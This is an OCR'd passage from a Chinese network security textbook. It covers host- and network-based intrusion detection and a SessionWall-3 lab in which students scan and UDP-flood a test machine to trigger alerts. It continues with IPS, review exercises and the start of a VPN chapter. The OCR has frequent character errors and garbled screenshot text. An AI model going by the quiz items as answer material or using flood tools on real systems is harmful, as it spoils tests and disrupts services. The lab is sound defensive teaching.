(1) 确定 攻击 是 否 成 功 。 由 于 基于 主机 的 IDS 使 用 含有 已 发 生 事件 的 信息 ,它们 可 
以 比 基 于 网 络 的 IDS 更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 一 方面 ,基于 主机 的 IDS 是 基 
于 网 络 的 IDS 的 完美 补充 ,网 络 部 分 可 以 尽早 提供 警告 ,主机 部 分 可 以 确定 攻击 成 功 
与 否 。 

(2) 监视 特定 的 系统 活动 。 基 于 主机 的 IDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访 
问 、 改 变 文件 权限 ,试图 建立 新 的 可 执行 文件 ,或 者 试图 访问 特殊 的 设备 。 例 如 ,基于 主机 的 
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IDS 可 以 监视 所 有 用 户 的 登录 及 下 网 情况 ,以 及 每 位 用 户 在 连接 到 网 络 以 后 的 行为 。 对 于 
基于 网 络 的 系统 要 做 到 这 个 程度 是 非常 困难 的 。 

基于 主机 的 IDS 还 可 监视 只 有 管理 员 才 能 实施 的 非 正常 行为 。 操 作 系统 记录 了 任何 
有 关 用 户 账号 的 增加 、 删 除 、 更 改 的 情况 ,只 要 非 授权 改动 ,基于 主机 的 IDS 就 能 检测 到 这 
种 不 适当 的 改动 。 基 于 主机 的 IDS 还 可 审计 能 影响 系统 记录 的 校 验 措施 的 改变 。 

基于 主机 的 IDS 可 以 监视 主要 系统 文件 和 可 执行 文件 的 改变 。 系 统 能 够 查 出 那些 欲 
改写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 ,并 将 它们 中 断 。 而 基于 网 络 的 IDS 
有 时 会 查 不 到 这 些 行为 。 

(3) 能 够 检查 到 基于 网 络 的 系统 检查 不 出 的 攻击 。 基 于 主机 的 系统 可 以 检测 到 那些 基 
于 网 络 的 系统 察觉 不 到 的 攻击 。 例 如 ,来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 络 , 所 以 可 以 躲 
开 基 于 网 络 的 人 侵 检测 系统 。 

(4) 适用 于 被 加 密 的 和 交换 的 环境 。 由 于 基于 主机 的 入 侵 检 测 系统 安装 在 遍布 企业 的 
各 种 主机 上 ,它们 比 基 于 网 络 的 入 侵 检 测 系统 更 加 适用 于 被 加 密 的 和 交换 的 环境 。 

交换 设备 可 将 大 型 网 络 分 成 许多 的 小 型 网 络 部 件 加 以 管理 ,所 以 从 覆盖 足够 大 的 网 络 
范围 的 角度 出 发 ,很 难 确定 配置 基于 网 络 的 IDS 的 最 佳 位 置 。 业 务 映射 和 交换 机 上 的 管理 
端口 有 助 于 此 ,但 这 些 技术 有 时 并 不 适用 。 基 于 主机 的 入 侵 检测 系统 可 安装 在 所 需 的 重要 
主机 上 ,在 交换 的 环境 中 具有 更 高 的 能 见 度 。 

某 些 加 密 方式 也 向 基于 网 络 的 入侵 检测 系统 发 出 了 挑战 。 由 于 加 密 方式 位 于 协议 堆栈 
内 ,所 以 基于 网 络 的 系统 可 能 对 某 些 攻击 没有 反应 ,基于 主机 的 IDS 没有 这 方面 的 限制 , 当 
操作 系统 及 基于 主机 的 系统 看 到 即将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

(5) 近 于 实时 的 检测 和 响应 。 尽 管 基于 主机 的 入 侵 检测 系统 不 能 提供 真正 实时 的 反 
应 ,但 如 果 应 用 正确 ,反应 速度 可 以 非常 接近 实时 。 老 式 系统 利用 一 个 进程 在 预先 定义 的 间 
隔 内 检查 登记 文件 的 状态 和 内 容 ,与 老式 系统 不 同 , 当 前 基于 主机 的 系统 的 中 断 指令 ,这 种 
新 的 记录 可 被 立即 处 理 , 显 著 减 少 了 从 攻击 验证 到 做 出 响应 的 时 间 ,在 从 操作 系统 做 出 记录 
到 基于 主机 的 系统 得 到 辨识 结果 之 间 的 这 段 时 间 是 一 段 延迟 ,但 大 多 数 情况 下 ,在 破坏 发 生 
之 前 ,系统 就 能 发 现 人 侵 者 ,并 中 止 他 的 攻击 。 

(6) 不 要 求 额外 的 硬件 设备 。 基 于 主机 的 入 侵 检测 系统 存在 于 现行 网 络 结构 之 中 , 包 
括 文件 服务 器 、Web 服务 器 及 其 他 共享 资源 ,这 些 使 得 基于 主机 的 系统 效率 很 高 ,因为 它们 
不 需要 在 网 络 上 另外 安装 登记 、 维 护 及 管理 硬件 设备 。 

(7) 记录 花费 更 加 低廉 。 基 于 网 络 的 入 侵 检 测 系统 比 基 于 主机 的 入侵 检测 系统 要 昂贵 
得 多 。 

基于 主机 的 人 侵 检测 系统 也 有 弱点 : 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 ,而 主机 审 
计 信 息 易 受 攻击 ,入 侵 者 可 设法 逃避 审计 ;全 面部 署 HIDS 代价 较 大 ;除了 监测 自身 的 主机 
以 外 ,不 监测 网 络 上 的 情况 ;HIDS 的 运行 或 多 或 少 会 影响 主机 的 性 能 ;只 对 主机 的 特定 用 
户 、 应 用 程序 执行 动作 和 日 志 进 行 检测 ,所 检测 到 的 攻击 类 型 有 限 。 

基于 主机 和 基于 网 络 的 入侵 检测 系统 都 有 其 优势 和 劣势 ,两 种 方法 互 为 补充 。 一 种 真 
正 有 效 的 人 侵 检测 系统 应 将 二 者 结合 。 基 于 主机 和 基于 网 络 的 入侵 检测 系统 的 比较 见 
表 8-1。 
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表 8-1 基于 主机 和 基于 网 络 的 入 侵 检 测 系统 的 比较 























项 目 HIDS NIDS 

操作 系统 的 事件 日 志 、 应 用 程序 的 事件 日 
数据 来 源 | 所 ,系统 调 用 ,端口 调用 和 安全 审计 记录 | 网 络 中 的 所 有 数据 包 
货 点 | 能 够 提供 更 为 详尽 的 用 户 行为 信息 :系统 复 | 不 会 影响 业务 系统 的 性 能 ;采取 劳 路 侦 听 工 
% | 杂 性 小 ; 误 报 率 低 作 方式 ,不 会 影响 网 络 的 正常 运行 

对 主机 的 依赖 性 很 强 ;对 主机 性 能 影响 较 ee 
| 不 能 检测 通过 加 密 通 道 的 攻击 

ri 
84 项 目 实施 


任务 : SessionWall 入 侵 检 测 软 件 的 使 用 


1. 任务 目标 

(1) 掌握 SessionWall-3 的 使 用 方法 。 

(2) 理解 入 侵 检测 系统 的 作用 。 

2. 任务 内 容 

(1) SessionWall-3 的 使 用 。 

(2) 自 定 义 QQ 服务 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 2000 Server 操作 系统 的 计算 机 1 台 ( 主 机 A) ,安装 有 Windows 
XP 操作 系统 的 计算 机 1 台 ( 主 机 B) 。 

(2) SessionWall-3 软件 1 套 。 

(3) X-Scan 扫描 软件 1 套 。 

(4) UDP Flood 攻击 软件 1 套 。 

4. 任务 实施 步骤 

1) SessionWall-3 的 使 用 

在 Windows 2000 Server 计算 机 (主机 A) 中 安装 SessionWall-3 软件 , 另 一 台 Windows 
XP 计算 机 (主机 B) 用 来 对 主机 A 实施 X-Scan 和 UDP Flood 攻击 。 

步骤 1: 在 Windows 2000 Server 计算 机 (主机 A) 上 安装 并 启动 SessionWall-3 软件 ， 
启动 后 的 主 窗口 如 图 8-3 所 示 。 

步骤 2: 在 另 一 台 Windows XP 计算 机 (主机 B) 上 启动 X-Scan 扫描 软件 ,对 主机 A 进 
行 各 种 安全 扫描 。 

步骤 3: 在 主机 A 上 可 看 到 报警 消息 图 标 和 及 和 安全 冲突 图 标 合 在 不 停 地 闪烁 ,并 发 出 

警 声 。 选 择 菜单 中 的 View-Alert Messages 命令 ,打开 如 图 8-4 所 示 的 对 话 框 ,该 对 话 

框 中 列 出 了 各 种 报警 消息 。 
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全 DOD 加 | 例 | 售 | 各 | 户 A 银 | 旬 他 骂 | 四 区 [0 


| Want to inpress your boss? Give hm he information he wants! Choose "Quey and show him the Usage Over Tine 妆 
reports_ 


Sessio Wall-3" 


The Nent Goneration of 


























图 8-3 ”SessionWall-3 主 窗口 


Dox|® 


A Suspicious Network Activity TCP Port Scanning Alert 
A ,URLILNK explott [Intrusion detection: 
A URL .LNK explot [Intrusion detection: ,.. 


A .URL LNK explot [Intrusion detection: … 
A ,URU.LNK explot [Intrusion detection; .,.. 
A ,URLI.LNK exploit [Intrusion detection: ,,. 
1 





图 8-4 报警 消息 


步骤 4: 查看 违反 安全 规则 的 行为 。SessionWall-3 中 内 置 了 许多 预定 义 的 违反 安全 规 
则 的 行为 , 当 检 测 到 这 些 行 为 发 生 的 时 候 , 系 统 会 在 Detected security violations 对 话 框 中 
显示 这 些 行为 。 在 工具 栏 上 单 击 show security violations 按钮 登 , 打 开 如 图 8-5 所 示 的 对 
话 框 ,该 对 话 框 中 列 出 了 检测 到 的 违反 安全 规则 的 行为 。 





Detected security violations 四 


DX|| 





入 TCP Port Scanning Fri, Apr 20,18:59 Fri Apr 20,19:00 Target: administ-ciypzx possible source: G620 
登 upp Port Scanning Fri, Apr 20,19:02 Fri, Apr 20,19:03 Target; administ-ciypzx possible source; G620 


登 upp Port Scanning Fri, Apr 20,19:05 Fri, Apr 20,19:09 Target: administ-ciypzx possible source: G620 





ol 
图 8-5 违反 安全 规则 的 行为 


步骤 5: 在 主机 B 上 对 主机 A 的 80 端口 发 起 UDP Flood 攻击 .查看 主机 A 的 最 近 活 动情 
况 (recent activity) ,如 图 8-6 所 示 , 可 见 主 机 A 在 80 端口 收 到 了 大 量 的 UDP 攻击 数据 包 。 
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图 8-6 UDP Flood 攻击 


2) 自 定义 QQ 服务 

SessionWall-3 已 经 预定 义 了 许多 服务 ,用户 根据 需要 也 可 以 自 定义 服务 ,如 QQ 服务 。 

步骤 1: 选择 菜单 中 的 Settings 一 Definitions 命令 ,打开 Definitions 窗口 ,在 Services 
选项 卡 中 显示 了 系统 预定 义 的 服务 ,如 图 8-7 所 示 。 

步骤 2: 单 击 Add 按钮 ,打开 Service Properties 对 话 框 ,设置 服务 名 称 为 QQ, 协 议 为 
UDP ,端口 号 为 8000, 如 图 8-8 所 示 , 单 击 OK 按钮 ,返回 Definitions 窗口 ,再 单 击 “确定 ” 








8-7 ”Definitions 窗口 8-8 ”Service Properties 对 话 框 
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步骤 3; 定义 好 QQ 服务 后 , 当 网 络 中 存在 QQ 连接 时 ,就 会 被 系统 监测 到 ,如 图 8-9 
所 示 。 





TT 


Data Edt Vew Functions Settings Help 
右 D 日 | 鲍 | 伯 | 多 | 名 A 傅 | 旬 访 怠 | 人 @ 民 |[O ® 
@ Minking toolbar button indicates new activiy. Click the button to see the alorts. 














日 禄 www (HTTP) Log 
白 夸 20 
Epste qzone oa cn 
口 Po5T- <I[CDATA[ 我 的 Qzone 第 一 天 ]]> 
口 PO5T - <I[CDATA[RNRN 开 通 了 空间 ,来 转 转 吧 





HTTP (word wde web) qogo3.store.qq,com G620 
HTTP (word wde web) tqlogo.en G620 
(HTTP (world wide web) qogo2.store.qq.com 6620 
Tr (World wide Web) qogol.store.qq.com 6620 





图 8-9 系统 监测 到 QQ 服务 


85 拓展 提升 : 入 侵 防护 系统 


随 着 网 络 入 侵 事 件 的 不 断 增加 和 黑客 攻击 水 平 的 不 断 提高 ,一 方面 ,网 络 遭 受 攻击 的 频 
度 日 益 加 快 ; 男 一 方面 ,网 络 受 到 攻击 做 出 响应 的 时 间 却 越 来 越 灌 后 。 要 解决 这 一 矛盾 , 传 


统 的 防火 墙 或 人 侵 检 测 技术 (IDS) 显 得 力不从心 ,这 就 需要 引入 一 种 全 新 的 技术 一 一 入 侵 
防护 系统 (intrusion prevention system,IPS) 。 
1. IPS 的 原理 


防火 墙 是 实施 访问 控制 策略 的 系统 ,对 流 经 的 网 络 流量 进行 检查 ,拦截 不 符合 安全 策略 

的 数据 包 。 入 侵 检 测 技术 (IDS) 通 过 监视 网 络 或 系统 资源 ,寻找 违反 安全 策略 的 行为 或 攻 
击 迹 象 ,并 发 出 报警 。 传 统 的 防火 墙 旨 在 拒绝 那些 明显 可 疑 的 网 络 流量 ,但 仍然 允许 某 些 流 
量 通过 ,因此 防火 墙 对 于 很 多 人 侵 攻 击 仍然 无 计 可 施 。 绝 大 多 数 IDS 系统 都 是 被 动 的 ,而 
不 是 主动 的 。 也 就 是 说 ,在 攻击 实际 发 生 之 前 ,它们 往往 无 法 预先 发 出 警报 。 而 人 侵 防 护 系 
统 (IPS) 则 倾向 于 提供 主动 防护 ,其 设计 宗旨 是 预先 对 入 侵 活 动 和 攻击 性 网 络 流量 进行 拦 
截 , 避 免 其 造成 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。IPS 是 通过 直 
接 嵌 入 网 络 流量 中 实现 这 一 功能 的 , 即 通过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ,经 过 检 
查 确认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 
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这 样 一 来 ,有 问题 的 数据 包 以 及 所 有 来 自 同一 数据 流 的 后 续 数 据 包 ,都 能 在 IPS 设备 中 被 清 
除 掉 。 

2. IPS 的 分 类 

(1) 基于 主机 的 人 侵 防护 系统 (HIPS)。 在 技术 上 ,HIPS 采用 独特 的 服务 器 保护 途径 ， 
由 包 过 滤 、 状 态 包 检测 和 实时 入 侵 检 测 组 成 分 层 防护 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 
率 的 前 提 下 ,最 大 限度 地 保护 服务 器 的 敏感 内 容 , 既 可 以 以 软件 形式 嵌入 应 用 程序 对 操作 系 
统 的 调用 当中 ,拦截 针对 操作 系统 的 可 疑 调 用 ,提供 对 主机 的 安全 防护 ,也 可 以 以 更 改 操作 
系统 内 核 程序 的 方式 ,提供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 , 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 诸如 缓冲 区 溢出 之 类 的 已 知 攻击 ,还 能 够 防范 未 知 攻击 ,防止 针对 Web 页 面 \ 应 用 和 资源 
的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ,不 同 的 平 
台 需 要 不 同 的 软件 代理 程序 。 

(2) 基于 网 络 的 入 侵 防 护 (NIPS)。NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 
的 安全 保护 。 由 于 它 采 用 在 线 连接 方式 ,所 以 一 旦 辨识 出 入 侵 行 为 ,NIPS 就 可 以 去 除 整个 
网 络 会 话 , 而 不 仅仅 是 复位 会 话 。 同 样 由 于 实时 在 线 , NIPS 需要 具备 很 高 的 性 能 ,以 免 成 
为 网 络 的 瓶颈 ,因此 NIPS 通常 被 设计 成 类 似 于 交换 机 的 网 络 设备 ,提供 线 速 否 叶 速 率 以 及 
多 个 网 络 端口 。 

3. IDS 和 IPS 的 关系 

绝 大 多 数 IDS 系统 都 是 被 动 的 ,而 不 是 主动 的 。 在 攻击 实际 发 生 之 前 ,IDS 往往 无 法 
预先 发 出 警报 。IPS 则 倾向 于 提供 主动 防护 ,其 设计 宗旨 是 预先 对 入 侵 活 动 和 攻击 性 网 络 
流量 进行 拦截 ,避免 其 造成 任何 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警 
报 。 这 也 是 IPS 市 场 启动 的 根源 。 

在 主动 防御 渐 和 人心 之 时 ,担当 网 络 警卫 的 IDS 的 报警 作用 更 加 重要 。 尽 管 IDS 功 过 
参半 ,但 是 IDS 的 报警 功能 仍 是 主动 防御 系统 所 必需 的 ,也 许 IDS 的 产品 形式 会 消失 ,但 是 
IDS 的 检测 功能 并 不 会 因 形式 的 消失 而 消失 ,只 是 逐渐 被 转化 和 吸纳 到 其 他 的 安全 设备 
当中 。 

IDS 与 IPS 技术 还 会 并 驾 齐 驱 很 长 一 段 时 间 。 据 市 场 研究 公司 Infonetics Research 发 
布 的 数据 显示 ,到 2006 年 ,全 球 IDS 与 IPS 市 场 收 入 已 超过 13 亿美 元 。 

其 实 IDS 的 发 展 道路 可 以 借鉴 防火 墙 的 发 展 。 防 火 墙 早期 从 包 过 滤 、 应 用 代理 发 展 起 
来 ,是 从 网 络 层 应 用 及 应 用 层 解释 开始 ,一 步 步 关心 起 具体 的 协议 。 包 过 滤 关 注 分 组 的 包 
头 ,应 用 代理 关心 分 组 的 有 效 载 荷 ,状态 检测 开始 关注 分 组 之 间 的 关系 。 从 安全 设备 发 展 的 
角度 ,这些 并 未 发 展 到 头 , 因 为 对 有 效 载 荷 的 分 析 还 比较 弱 。IDS 从 特征 匹配 开始 到 协议 分 
析 , 走 的 也 是 这 条 路 ,只 是 IDS 走 到 协议 分 析 . 也 算是 比较 深入 了 ,但 网 络 上 的 应 用 太 复 杂 
了 ,技术 挑战 性 太 大 ,依照 当前 的 用 法 与 定位 ,IDS 长 期 很 难 生存 。 但 它 对 分 组 有 效 载荷 的 
分 析 有 自己 的 优势 ,这 种 技术 可 以 用 于 所 有 的 网 络 安全 设备 。IPS 其 实 解决 的 也 是 边界 安 
全 问题 , 它 已 开始 像 是 防火 墙 的 升级 版 了 。 

由 此 来 看 ,IDS 和 IPS 将 会 有 着 不 同 的 发 展 方向 和 职责 定位 。IDS 短期 内 不 会 消亡 ， 
IPS 也 不 会 完全 取代 IDS 的 作用 。 虽 然 IPS 市 场 前 景 被 绝 大 多 数 人 看 好 ,市 场 成 熟 指 日 可 
待 ,但 要 想 靠 蚕食 IDS 市 场 来 扩大 市 场 份额 ,对 于 IPS 来 说 还 是 很 艰难 的 。 
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习 题 

一 、 选 择 题 
1. 入侵 检测 系统 是 对 ( ) 的 合理 补充 ,帮助 网 络 抵御 网 络 攻击 。 

A. 交换 机 B. 路 由 器 C. 服务 器 D. 防火 墙 
2. 根据 数据 分 析 方法 的 不 同 , 入 侵 检 测 系 统 可 以 分 为 ( ) 两 类 。 

A. 基于 主机 和 基于 网 络 B. 基于 异常 和 基于 误 用 

C. 集中 式 和 分 布 式 D. 离线 检测 和 在 线 检测 
3.， 人 侵 检测 系统 按 数据 来 源 可 以 分 为 基于 ( ) 和 基于 ( ) 两 种 。 

A. 主机 ”网 络 B. 主机 服务 器 

C. 网 络 ”服务 器 D. 服务 器 ”客户 机 
4. 下 面 ( ) 不 属于 误 用 检测 技术 的 特点 。 

A. 发 现 一 些 未 知 的 入 侵 行为 B. 误 报 率 低 ,准确 率 高 

C. 对 系统 依赖 性 较 强 D. 对 一 些 具体 的 行为 进行 判断 和 推理 
5. 下 列 ( ) 不 是 基于 主机 的 IDS 的 特点 。 

A. 占用 主机 资源 


B. 对 网 络 流量 不 敏感 
C. 依赖 于 主机 的 固有 的 日 志和 监控 能 力 
D. 实时 检测 和 响应 
6. 以 下 关于 入 侵 检 测 系统 说 法 中 ,正确 的 是 ( Ns 
A. 入侵 检测 系统 就 是 防火 墙 系统 
B. 入 侵 检 测 系 统 可 以 取代 防火 墙 
C. 入 侵 检 测 系统 可 以 审计 系统 配置 和 漏洞 
D. 入 侵 检测 系统 不 具有 断 开 网 络 的 功能 
7. 为 了 防止 人 侵 ,可 采用 的 技术 是 ( js 


A. 人 侵 检测 技术 B. 查 杀 病毒 技术 
C. 防火 墙 技术 D. VPN 技术 
8.( ) 方 法 主要 来 源 于 这 样 的 思想 : 任何 人 的 正常 行为 都 是 有 一 定 的 规律 的 ,并 且 


可 以 通过 分 析 这 些 行 为 产生 的 日 志 信 息 (假定 日 志 信 息 足 够 安全 ) 总 结 出 这 些 规律 ,而 入 侵 
和 滥用 行为 则 通常 和 正常 的 行为 存在 严重 的 差异 ,通过 检查 这 些 差异 就 可 以 检测 出 这 些 
人 侵 。 
A. 基于 异常 的 人 侵 检测 B. 基于 误 用 的 入 侵 检测 
C. 基于 自治 代理 技术 D. 自 适 应 模型 生成 特性 的 入 侵 检测 系统 
二 、 填空 题 
1. CIDF 提出 了 一 个 通用 模型 ,将 入 侵 检测 系统 分 为 四 个 基本 组 件 : ¥ 
和 . 
人 的 含义 是 : 通过 某 种 方式 预先 定义 人 侵 行 为 ,然后 监视 系统 的 运行 ,并 找 
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出 符合 预先 定义 规则 的 入 侵 行 为 。 

3. 面 对 当 今 用 户 呼 吁 采取 主动 防御 ,早先 的 IDS 体现 了 自身 的 缺陷 ,于 是 出 现 
也 ,提供 了 主动 性 的 防护 。 

4. 实际 无 害 的 事件 却 被 IDS 检测 为 攻击 事件 称 为 

三 、 简 答题 

1. 什么 是 IDS? 它 有 什么 基本 功能 ? 

2. 简 述 公共 入 侵 检 测 框架 (CIDF) 模 型 。 

3. 基于 主机 的 入侵 检测 和 基于 网 络 的 人 侵 检测 有 何 区 别 ? 

4. 基于 异常 的 入 侵 检测 和 基于 误 用 的 入 侵 检测 有 何 区 别 ? 

5. 未 来 IDS 会 退出 历史 舞台 吗 ? IPS 会 取代 IDS 吗 ? 
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项 目 9 VPN 技 术 


【项 目 目标 】 


(1) 了 解 VPN 的 概念 和 作用 。 

(2) 了 解 VPN 的 分 类 和 处 理 过 程 。 

(3) 了 解 VPN 的 关键 技术 和 协议 。 

(4) 了 解 Windows Server 2008 操作 系统 的 “路 由 和 远程 访问 ”角色 服务 。 
(5) 掌握 VPN 的 配置 方法 。 

(6) 了 解 IPSec VPN 与 SSL VPN。 


91 项 目 提 出 


随 着 公司 规模 的 快速 扩张 , 张 先生 在 全 国 各 地 开办 了 上 百 家 分 公司 。 由 于 总 公司 的 财 
务 系统 .OA 、ERP、CRM 等 软件 系统 需要 将 各 地 分 公司 的 数据 实时 汇总 、 集 中 管理 ,统一 存 
储 和 统一 安全 防护 ,需要 将 总 公司 与 各 地 分 公司 进行 联网 。 

虽然 可 以 租用 电信 运营 商 的 专线 进行 联网 ,但 专线 费用 昂贵 ,况且 同一 运营 商 的 网 络 覆 
盖 范 围 有 限 ,不 能 提供 跨 运营 商 的 专线 租赁 服务 ,导致 只 能 租用 一 家 运营 商 的 专线 (如 中 国 
电信 )。 而 * 南 电信 , 北 网 通 ” 导 致 北方 有 的 分 公司 不 在 中 国电 信 的 网 络 覆 盖 范 围 之 内 。 

如 果 直 接 使 用 因特网 进行 网 络 简单 互联 , 则 会 带 来 很 多 安全 性 问题 ,如 ERP 服务 器 被 
因特网 上 的 黑客 发 现 和 攻击 ,口令 被 破解 ,传输 的 数据 被 截获 …… 

另外 , 张 先生 经 常 要 到 外 地 出 差 ,出 差 期 间 可 能 需要 访问 公司 局 域 网 内 部 的 资料 ,访问 
过 程 中 的 数据 传输 安全 也 是 不 可 避免 的 问题 。 为 此 , 张 先生 需要 找到 一 个 切实 可 行 的 解决 
方案 。 


92 项 目 分 析 


在 经 济 全 球 化 的 今天 , 越 来 越 多 的 公司 ,企业 开始 在 各 地 建立 分 支 机 构 ,开展 业务 ,移动 
办 公 人 员 也 随 之 剧 增 。 在 这 样 的 背景 下 ,这 些 在 家 办 公 或 下 班 后 继续 工作 的 人 员 和 移动 办 
公 人 员 ,远程 办 公 室 ,公司 各 分 支 机 构 , 公 司 与 合作 伙伴 、 供 应 商 ,公司 与 客户 之 间 都 可 能 需 
要 建立 连接 通道 以 进行 信息 传送 。 
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传统 的 企业 组 网 方案 中 ,要 进行 远程 LAN 到 本 地 LAN 之 间 的 互联 ,除了 租用 DDN 专 
线 或 帧 中 继 之 外 ,并 无 更 好 的 解决 方法 。 对 于 移动 用 户 与 远 端 用 户 而 言 ,只 能 通过 拨号 线路 
进入 企业 各 自 独立 的 局 域 网 。 这 样 的 方案 必然 导致 高 昂 的 长 途 线 路 租用 费 及 长 途 电话 费 。 
于 是 ,虚拟 专用 网 的 概念 与 市 场 随 之 出 现 。 

虚拟 专用 网 是 企业 网 在 因特网 等 公共 网 络 上 的 延伸 ,通过 一 个 私有 的 通道 在 公共 网 络 
上 创建 一 个 安全 的 私有 连接 。 虚 拟 专用 网 通过 安全 的 数据 通道 将 远程 用 户 、 公 司 分 支 机 构 、 
公司 业务 伙伴 等 跟 公 司 的 企业 网 连接 起 来 ,构成 一 个 扩展 的 公司 企业 网 。 在 该 网 中 的 主机 
将 不 会 觉察 到 公共 网 络 的 存在 ,仿佛 所 有 的 主机 都 处 于 同一 个 网 络 之 中 ,公共 网 络 仿佛 是 只 
由 本 网 络 在 独占 使 用 ,而 事实 上 并 非 如 此 ,所 以 称 为 虚拟 专用 网 。 虚 拟 专用 网 具有 成 本 低 
廉 ,可 扩展 性 好 、 自 主 控制 的 主动 权 、 全 方位 的 安全 保护 、 性 价 比 高 、 使 用 和 管理 方便 ` 原 有 投 
资 得 到 保护 等 优点 。 

该 项 目 实际 上 可 由 Windows Server 2008 操作 系统 的 “路 由 和 远程 访问 ”角色 完成 , 通 
过 该 角色 部 署 VPN, 能 够 解决 上 述 问 题 。 为 此 , 张 先生 决定 采用 虚拟 专用 网 技术 实现 总 公 
司 与 各 地 分 公司 的 安全 联网 ,并 实现 出 差 用 户 安全 访问 公司 局 域 网 。 





93 相关 知识 点 


9.3.1 VPN 概述 


虚拟 专用 网 (virtual private network,VPN) 是 指 通过 一 个 公用 网 络 ( 通 常 是 因特网 ) 建 
立 的 一 个 临时 的 安全 连接 ,是 一 条 穿 过 公用 网 络 的 安全 、 稳 定 的 隧道 。VPN 是 企业 网 在 因 
特 网 等 公共 网 络 上 的 延伸 , 它 通 过 安全 的 数据 通道 ,帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙伴 
及 供应 商 与 公司 的 内 部 网 建立 可 信 的 安全 连接 ,并 保证 数据 的 安全 传输 ,构成 一 个 扩展 的 公 
司 企业 网 ,如 图 9-1 所 示 。VPN 可 用 于 不 断 增 长 的 移动 用 户 的 全 球 因 特 网 接 人 ,以 实现 安 
全 连接 ,可 用 于 实现 企业 网 络 之 间 安 全 通信 的 虚拟 专用 线路 。 

通俗 地 讲 ,VPN 实际 上 是 “线路 中 的 线路 ”, 类 型 于 城市 道路 上 的 “公交 专用 线 ”, 所 不 同 
的 是 ,由 VPN 组 成 的 “线路 "并 不 是 物理 存在 的 ,而 是 通过 技术 手段 模拟 出 来 的 , 即 是 “ 虚 
拟 ? 的 。 不 过 ,这 种 虚拟 的 专用 网 络 技术 却 可 以 在 一 条 公用 线路 中 为 两 台 计 算 机 建立 一 个 逻 
辑 上 的 专用 “通道 ”, 它 具有 良好 的 保密 性 和 不 受 干扰 性 ,使 双方 能 进行 自由 而 安全 的 点 对 点 
连接 ,因此 得 到 网 络 管理 员 的 广泛 关注 。 

因特网 工程 任务 小 组 (Internet engineering task force,IETF) 已 经 开始 为 VPN 技术 制 
定 标 准 , 基 于 这 一 标准 的 产品 ,将 使 各 种 应 用 场合 下 的 VPN 具有 充分 的 互 操 作 性 和 可 扩 
展 性 。 

VPN 可 以 实现 不 同 网 络 组 件 和 资源 之 间 的 相互 连接 ,利用 因特网 或 其 他 公共 互联 网 络 
的 基础 设施 为 用 户 创建 隧道 ,并 提供 与 专用 网 络 一 样 的 安全 和 功能 保障 。 提 高 VPN 效用 
的 关键 问题 在 于 当 用 户 的 业务 需求 发 生变 化 时 ,用 户 能 很 方便 地 调整 他 的 VPN 以 适应 变 
化 ,并 且 能 方便 地 升级 到 将 来 新 的 TCP/IP 版 本 ;而 那些 提供 门类 齐全 的 软 、 硬 件 VPN 产品 
的 供应 商 , 则 能 提供 一 些 灵 活 的 选择 以 满足 用 户 的 要 求 。 目 前 的 VPN 产品 主要 运行 在 
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图 9-1 虚拟 专用 网 











IPv4 之 上 ,但 应 当 具 备 升级 到 IPv6 的 能 力 ,同时 要 保持 良好 的 互 操作 性 。 
9.3.2 VPN 的 特点 


VPN 是 平衡 Internet 的 实用 性 和 价格 优势 的 最 有 前 途 的 通信 手段 之 一 。 利 用 共享 的 
IP 网 络 建立 VPN 连接 ,可 以 使 企业 减少 对 昂贵 的 租用 专线 和 复杂 的 远程 访问 方案 的 依赖 
性 。 它 具有 以 下 特点 。 

(1) 安全 性 。 用 加 密 技 术 对 经 过 隧道 传输 的 数据 进行 加 密 , 以 保证 数据 仅 被 指定 的 发 
送 者 和 接收 者 了 解 ,从 而 保证 了 数据 的 私有 性 和 安全 性 。 

(2) 专用 性 。 在 非 面向 连接 的 公用 IP 网 络 上 建立 一 个 迎 辑 的 ,点 对 点 的 连接 , 称 为 建 
立 一 个 隧道 。 

(3) 经 济 性 。 它 可 以 使 移动 用 户 和 一 些小 型 的 分 支 机 构 的 网 络 开销 减少 ,不 仅 可 以 大 
幅度 削减 传输 数据 的 开销 ,同时 可 以 削减 传输 话音 的 开销 。 

(4) 扩展 性 和 灵活 性 。 能 够 支持 通过 Intranet 和 Extranet 的 任何 类 型 的 数据 流 ,方便 
增加 新 的 节点 ,支持 多 种 类 型 的 传输 媒介 ,可 以 满足 同时 传输 语音 、 图 像 和 数据 等 新 应 用 对 
高 质量 传输 以 及 带宽 增加 的 需求 。 


9.3.3 VPN 的 处 理 过 程 


一 条 VPN 连接 一 般 由 客户 机 、 隧 道 和 服务 器 3 部 分 组 成 。VPN 系统 使 分 布 在 不 同 地 

方 的 专用 网 络 在 不 可 信任 的 公共 网 络 上 安全 的 通信 。 它 采用 复杂 的 算法 来 加 密 传输 的 信 
息 , 使 敏感 的 数据 不 会 被 窃听 。 其 处 理 过 程 大 体 如 下 ,如 图 9-2 所 示 。 
(1) 要 保护 的 主机 发 送 明 文 信息 到 连接 公共 网 络 的 VPN 设备 。 

(2) VPN 设备 根据 网 管 设置 的 规则 ,确定 是 否 需 要 对 数据 进行 加 密 或 让 数据 直接 
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图 9-2 VPN 的 处 理 过 程 


通过 。 

(3) 对 需要 加 密 的 数据 ,VPN 设备 对 整个 数据 包 进行 加 密 和 附 上 数字 签名 。 

(4) VPN 设备 加 上 新 的 数据 报头 ,其 中 包括 目的 地 VPN 设备 需要 的 安全 信息 和 一 些 
初始 化 参数 。 

